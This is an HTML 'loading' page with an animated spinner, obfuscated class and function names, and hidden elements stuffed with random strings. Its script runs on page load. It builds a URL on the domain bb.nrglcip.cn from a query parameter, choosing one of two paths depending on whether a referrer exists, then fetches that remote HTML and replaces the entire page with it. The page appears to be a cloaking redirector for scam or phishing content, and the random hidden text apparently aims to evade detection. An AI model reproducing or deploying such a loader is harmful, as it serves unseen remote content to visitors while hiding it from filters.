<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .nP8mBf8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .nP8mBf8 .lke3CPSW9Aj {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .nP8mBf8 .content {
            line-height: 50px;
            text-align: center
        }

        .nP8mBf8 .img {
            width: 100%
        }

        .nP8mBf8 .cA81Sn3 {
            text-align: center
        }

        .nP8mBf8 .cA81Sn3 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .nP8mBf8 .cA81Sn3 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .nP8mBf8 .cA81Sn3 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .nP8mBf8 .cA81Sn3 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .nP8mBf8 .cA81Sn3 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .nP8mBf8 .cA81Sn3 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .nP8mBf8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function TbyXpQRqBEig(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var QLelEKY = TbyXpQRqBEig('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ QLelEKY +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ QLelEKY +".html?a=share";
		}
		
        jT7AzB=url+"#"+new Date().getTime();
        jT7AzB && function() {
            $.get(jT7AzB, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<b style='display:none' >dIisNFHD4tDHh0v2SzyiiHu9iWbENnDuV</b>
<b style='display:none' >dIisNFHD4tDHh0v2SzyiiHu9iWbENnDuV</b>
<a  href='#' style='display:none'>Jgo9gMMIOYJlJFyfLYH5IthZM66lKfpNagwiuIidJcxAJK6JNNFoA8z3nDOosEtP8KHO1ahhIbDE</a>
<h1 style='display:none' >xKFHdgs7dvTK7TjhzqxK5hzLUnztrYnKu5hhF0ubRMiQKJPF3QCCgTnHyn4g3xb1DB7vuV0rAcqDOmoC7V0okqQwaCaXFAEex1C</h1><div class="nP8mBf8">
    <div class="lke3CPSW9Aj">
        <div class="cA81Sn3">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>gl24jWVHVE3GjR</a>
<h1 style='display:none' >uVvDrVEjwMLkPA7Z</h1>
<img  src='' style='display:none'>
<ul style='display:none' >XN8rP0pwWt9qD41ZsGbqk9TUPqqDDgksih41x6LPZd9cl6kZHUGkOd56Yj8tOWJ6XEbGGTfIqEAoT</ul>
<a  href='#' style='display:none'>gl24jWVHVE3GjR</a></body>
</html>